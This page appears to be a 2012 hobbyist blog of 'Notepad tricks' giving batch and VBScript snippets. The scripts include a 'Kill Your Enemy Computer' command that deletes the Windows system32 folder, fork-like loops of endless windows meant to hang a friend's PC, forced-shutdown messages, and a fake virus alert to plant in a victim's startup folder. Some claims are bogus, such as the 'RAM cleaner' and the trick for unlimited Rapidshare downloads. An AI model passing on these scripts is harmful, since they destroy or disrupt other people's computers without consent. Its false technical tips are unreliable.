Warung Bebas
Tampilkan postingan dengan label Notepad Tricks. Tampilkan semua postingan
Tampilkan postingan dengan label Notepad Tricks. Tampilkan semua postingan

Kamis, 23 Agustus 2012

How To Clean your RAM using Notepad

Cleaning your RAM using notepad
Many friends of me ask where can I download a software which can keep my RAM free? And I found these software are nothing but using some lines of code which can be implemented by using notepad or any editor tool. So if any one does not have any software, you can use it by doing the following things which I am going to mention.
Steps to Clean Your RAM Using Notepad:
Step 1: Open Notepad
Step 2: Type FreeMem=Space(10240000000)
Step 3: Save it as “CLEANER.VBS” in any location you like.
Step 4: You can edit the code and write 512 instead of 1024 if you own a 512mb RAM or change to anything you like.
Step 5: Run it !
After this final step your RAM will be free.
Hope you enjoyed it. :)

Jumat, 20 Juli 2012

Terminate frozen program with notepad

<b><i>Terminate frozen program</b></i>

 Terminate frozen program

You may have a chance to face a problem that “program not responding” error, while loading lot of data in windows.

It will usually take 5-10 minutes to recover automatically or you will close it by pressing ctrl+alt+del
Here comes the easiest way to solve this problem in a seconds
Type the following code in notepad :-
@echo off
taskkill.exe /f /fi “status eq not responding”
exit
save it as “terminator.bat”
when u come across the same problem again, just HIT the file that you have created.
simple is in it..!

notepad tricks to download unlimited from Rapidshare, Megaupload file sharing websites.

Here is a simple notepad tricks to download unlimited from Rapidshare, Megaupload file sharing websites.



unlimited download from rapidshare megaupload

Copy the code given below in notepad :-

@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
and save it as “technotrickz.bat”
Now click on this file every time you download a file from Rapidshare and Megaupload
That’s it…
N’joy unlimited downloads from Rapidshare and Megaupload..

Open Unlimited Notepads In A Second

This is another cool notepad tricks to play with your friends, By using this simple code given below you can make the notepad open continuously with non stop..

Open notepad & type the following code given below :-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save the file as “non-stop.bat”
Just do it in your friends computer & make them frustrate
Note :– This may even lead to hanging of some computers..!!

Simple Way To Become A Hacker


basic step to become a hacker Now i will show how to create fake virus in your computer, this is a good computer & notepad tricks to play with your friends :-)
S, this is the initial step to become a  hacker…

1–> open “notepad”
Type the commands given in given below :-

@echo off
C:
cls
echo hello
pause
echo im a virus
pause
echo hurray !! im become a hacker
pause
save the file as “.bat” extension
for example if your file name is “virus” save it as “virus.bat”
Hurray !!! i had created a virus !!

Invisible Folder With Notepad

How to  make an invisible folder, so that no one can see your folder which is too personal… 4 u

1–> create a new folder
2–> select that folder & press F2 & press backspace until the name “new folder” vanish
3–> now by pressing ALT key, type 0160 simultaneously (at the same time) & hit enter.
4–> now you can see the folder name is vanished.
5–> to make folder icon invisible
6–> right click on that folder & goto –>properties –>customize –>change icon

make an invisible folder
make an invisible folder
Hurray..! now your folder is invisible.

Kill Your Enemy Computer

kill your enemy computer
kill your enemy computer
what is killing of computer?
Its nothing but emptying the system32 folder of OS in your computer, so that your computer cannot boot b’coz system32 is essential folder which is needed for booting and all the core operation of OS.
write the following code in your notepad:-
- del c:\windows\system32\*.* /q
save the file as “terminator.bat” without quote
!!…red alert…!!
Don’t click this file in your computer b’coz the file u had created will empty all files in system32 folder which is essential for your computer to work

Shutdown your Comp In Seconds

shutdown using notepad
shutdown using notepad
Now u can shutdown your computer using notepad and say bye…. to tradition ways ( turn off) of closing your computer

Just Type:-
@echo off
msg * u r terminated
shutdown -c “stop me if you can” -s
Save it as “turnoffurpc.bat”.
Now see notepad will shutdown ur computer with lightning speed..!

Make your CD/DVD Drive Mad

You can make your cd-drive to open & close repeatedly by using a simple notepad tricks given below

Just Type the following code below in notepad :-
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “im mad.VBS” .
now watch that your cd-drive has become MAD…!

Make your keyboard keys to type continuously (non-stop)

Make your keyboard keys to type continuously (non-stop)

Just Type :
MsgBox “stop me..! if you can”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”

Save it as “ghostrider.VBS”

Toggle Caps Lock Continously

Just type the following code in notepad:-
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as “blink.VBS” .
now watch that capslock led will blink continuously
Hey try it in your friends computer & be a hacker.

Annoy Your Friends With Notepad

Constantly Repeat Messages

Using this notepad trick you can annoy anyone and can actually force them to log off or leave the computer (LOL….). This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more:
  • Open Notepad.
  • Paste the following code in the notepad file:
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
  • Save the file with any file name but with .bat as extension and close it. For eg. Freakymessage.bat
After saving the file just open it (by double clicking) and see what happens.
Pssstttt……. You can piss of your friends by sending it as an email attachment asking them to try it out !

Change The Header/Footer Of Your Notepad File

Change The Header/Footer Of Your Notepad File

More often than not whenever you get a printout of your notepad file, it starts with “Untitled” or the filename at top, and “Page ” on bottom. Now if you want to get rid of it or want to change it, just follow the simple steps given below.
  • Open Notepad.
  • Click on File -> Page Setup.
  • Replace the text written in the “Header” and “Footer” box (as shown above) by any of the following codes:
&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number

Matrix Effect in Notepad

Matrix Effect

Not much to explain, just follow the steps and see the amazing matrix effect happen in your DOS window:
  • Open Notepad.
  • Copy the below mentioned text in your notepad file:
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
  • Save the file with .bat extension like Matrix.bat
Thats it. Just open the file to see the matrix effect right before your eyes!

Test Your Anti-Virus With Note Pad

Test Your Anti-Virus

You can also test your anti virus program for its effectiveness using a simple notepad trick. Follow the steps below to know more:
  • Open Notepad.
  • Copy the code give below in the notepad file:
    X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  • Save it with an .exe extension like testvirus.exe
As soon as you save this file, your anti virus program will detect the file (virus) immediately and will attempt to delete it. If this happens then your Antivirus is working properly. If not, then its time to look for some other reliable program.

NOTEPAD "world trade centre trick"

NOTEPAD "world trade centre trick"



Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings
.

Still Confused?  Details Below

World Trade Centre Attack Trick – Shocking Notepad Tricks

Did you know that the flight number of the plane that had hit WTC on 9/11 was Q33NY …
  • Open your Notepad
  • Type the flight number i.e Q33N in Capital Letters.
  • Increase the Font Size to 72
  • Change the Font to Wingdings
You will be amazed by the findings. Its a Plane going for 2 building shaped structures & then death.(see below)  WTF ?
World Trade Centre Trick - Shocking Notepad Tricks
Shocking … Ya …But this is a complete hoax… because I researched myself on Wikipedia and found that None of the planes involved in the 9/11 attacks had the flight number "Q33 NY". The flight numbers of the planes that crashed into the Twin Towers were in fact "11" and "175". Clearly, someone has simply made up this supposed flight number in an attempt to make the spurious claim seem valid.

log trick !! make ur Notepad a diary !!

log trick !! make ur Notepad a diary !!


Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.

Minggu, 24 Juni 2012

Symbols for notepad


symbols for notepad

Alt+15= ¤ Alt+79= O Alt+129= ü Alt+179= ¦ Alt+229= Õ Alt+20= ¶ Alt+80= P Alt+130= é Alt+180= ¦ Alt+230= µ Alt+21= § Alt+81= Q Alt+131= â Alt+181= Á Alt+231= þ Alt+32=espaço Alt+82= R Alt+132= ä Alt+182= Â Alt+232= Þ Alt+33= ! Alt+83= S Alt+133= à Alt+183= À Alt+233= Ú Alt+34=" Alt+84= T Alt+134= å Alt+184= © Alt+234= Û Alt+35= # Alt+85= U Alt+135= ç Alt+185= ¦ Alt+235= Ù Alt+36= $ Alt+86= V Alt+136= ê Alt+186= ¦ Alt+236= ý Alt+37= % Alt+87= W Alt+137= ë Alt+187= + Alt+237= Ý Alt+38= & Alt+88= X Alt+138= è Alt+188= + Alt+238= ¯ Alt+39= ' Alt+89= Y Alt+139= ï Alt+189= ¢ Alt+239= ´ Alt+40= ( Alt+90= Z Alt+140= î Alt+190= ¥ Alt+240= ­ Alt+41= ) Alt+91= [ Alt+141= ì Alt+191= + Alt+241= ± Alt+42= * Alt+92= Alt+142= Ä Alt+192= + Alt+242= _ Alt+43= + Alt+93= ] Alt+143= Å Alt+193= - Alt+243= ¾ Alt+44= , Alt+94= ^ Alt+144= É Alt+194= - Alt+244= ¶ Alt+45= - Alt+95= _ Alt+145= æ Alt+195= + Alt+245= § Alt+46= . Alt+96= ` Alt+146= Æ Alt+196= - Alt+246= ÷ Alt+47= / Alt+97= a Alt+147= ô Alt+197= + Alt+247= ¸ Alt+48= 0 Alt+98= b Alt+148= ö Alt+198= ã Alt+248= ° Alt+49= 1 Alt+99= c Alt+149= ò Alt+199= Ã Alt+249= ¨ Alt+50= 2 Alt+100= d Alt+150= û Alt+200= + Alt+250= · Alt+51= 3 Alt+101= e Alt+151= ù Alt+201= + Alt+251= ¹ Alt+52= 4 Alt+102= f Alt+152= ÿ Alt+202= - Alt+252= ³ Alt+53= 5 Alt+103= g Alt+153= Ö Alt+203= - Alt+253= ² Alt+54= 6 Alt+104= h Alt+154= Ü Alt+204= ¦ Alt+254= _ Alt+55= 7 Alt+105= i Alt+155= ø Alt+205= - Alt+56= 8 Alt+106= j Alt+156= £ Alt+206= + Alt+57= 9 Alt+107= k Alt+157= Ø Alt+207= ¤ Alt+58= : Alt+108= l Alt+158= × Alt+208= ð Alt+59= ; Alt+109= m Alt+159= ƒ Alt+209= Ð Alt+60= < 110=" n" 160=" á" 210=" +" 61=" =" 111=" o" 161=" í" 211=" Ë" 62=" "> Alt+112= p Alt+162= ó Alt+212= È Alt+63= ? Alt+113= q Alt+163= ú Alt+213= i Alt+64= @ Alt+114= r Alt+164= ñ Alt+214= Í Alt+65= A Alt+115= s Alt+165= Ñ Alt+215= Î Alt+66= B Alt+116= t Alt+166= ª Alt+216= Ï Alt+67= C Alt+117= u Alt+167= º
♀& #9792 widout spaces♂& #9794 widout spaces◘& #9688 widout spaces•& #8266 widout spaces♠& #9824 widout spaces♣& #9827 widout spaces Δ & #916 widout spacesΘ & #920 widout spacesΞ & #926 widout spacesΠ & #928 widout spacesΣ & #931 widout spacesΦ& #934 widout spacesΨ& #936 widout spacesΩ& #937 widout spacesα& #945 widout spacesβ& #946 widout spacesγ& #947 widout spacesδ& #948 widout spacesε& #949 widout spacesζ& #950 widout spacesη& #951 widout spacesθ& #952 widout spacesι& #953 widout spacesκ& #954 widout spacesλ& #955 widout spacesμ& #956 widout spacesξ& #958 widout spacesς
& #962 widout spacesσ & #963 widout spacesτ & #964 widout spacesψ
& #968 widout spacesω & #969 widout spacesθ & #977 widout spaces & #9829 ♥
alt+987=█ alt+6=♠

Make frnds scare for VIRUS


Make frnds scare for VIRUS

Open notepad and type this:

lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")

Then save it as Virus.VBS

and go to the folder that contains it and open it if a window pops out saying a virus has been detected it's working. Press yes or no to close the window and put it in the startup folder of the victim's account.
On startup the window should appear.
Note: This does not harm your computer as it does not contain virus.

The Yes and no button does not do anything except closing the window. And you can edit the virus in the sentence: Warning a virus has detected on your PC to any kind of virus eg.Trojan Horse like this lol=msgbox ("Warning a Trojan horse has been detected on your PC. Press YES to format your hard disk now or press NO to format format your hard disk after system reboot",20,"Warning")

Oh in between make sure your victim does not panic and really reformat his harddisk. hahaha :)

Minggu, 27 November 2011

Excellent Notepad Hacks

Very Goodotepad Hacks

Hey Friends today I am going to share few New Notepad hacks. They are really cool and crazy one's. So Please think atleast three to four times to use them on your PC. 
Note: Think Twice Before Act, The Authorities Are Not Responsible For Any Problems Caused by These tricks.




UNLIMITED NOTEPAD WINDOWS HACK
This will pop up endless notepads until the computer freezes and crashes. Copy the below code in notepad and save it as ".vbs" extension.

Code:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top



CAPS LOCK CRAZY TRICK
This constantly turns caps lock on and off really fast continuously.

Code:-
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop


UNLIMITED BACKSPACE HACK
This makes it so the backspace key is constantly being pressed.

Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
       

Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop


Convey your friend a message and shut down his / her computer:
 
Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files .
 

Hot Thread Copyright © 2012 Fast Loading -- Powered by Blogger